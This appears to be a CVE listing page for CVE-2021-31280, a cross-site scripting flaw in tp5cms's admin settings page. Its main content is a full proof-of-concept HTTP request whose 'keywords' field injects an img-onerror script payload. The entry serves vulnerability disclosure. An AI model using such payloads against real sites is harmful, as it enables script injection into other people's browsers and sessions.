Headline

CVE-2021-31280: tp5cms v1.0.0 has XSS vulnerability · Issue #8 · fmsdwifull/tp5cms

An issue was discovered in tp5cms through 2017-05-25. admin.php/system/set.html has XSS via the keywords parameter.

1 year ago

#xss #vulnerability #web #windows #php #firefox

POST /tp5cms/admin.php/system/set.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------305965989412446621523406000615
Content-Length: 440
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/tp5cms/admin.php/system/set.html
Cookie: Hm_lvt_e2ecc5a8268ea1a4c9862ec7b4ee5b11=1616071270,1616593944; UIA=LnYsM2ArXDEvK14uYl80MjdiLjIuMi1bMzVkNGA2MS41K18zLF4yXmM0NGMsK2EtLjBfNDIvKjI0NWRfYjYwLjNf; SESSaca5a63f4c2fc739381fab7741d68783=n11Zs1mLNKhaiuuCo-dWUHMUcx6LVhgqmKzBVLUdp0s; __atuvc=1%7C12; PHPSESSID=kiqmpq7bdvenup0sg9t3euflio; Hm_lpvt_e2ecc5a8268ea1a4c9862ec7b4ee5b11=1616643419
Upgrade-Insecure-Requests: 1

-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="title"

11
-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="keywords"

"><img src=xss onerror=alert(1)>
-----------------------------305965989412446621523406000615
Content-Disposition: form-data; name="description"

1
-----------------------------305965989412446621523406000615--

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

12 months ago

12 months ago

12 months ago

12 months ago

12 months ago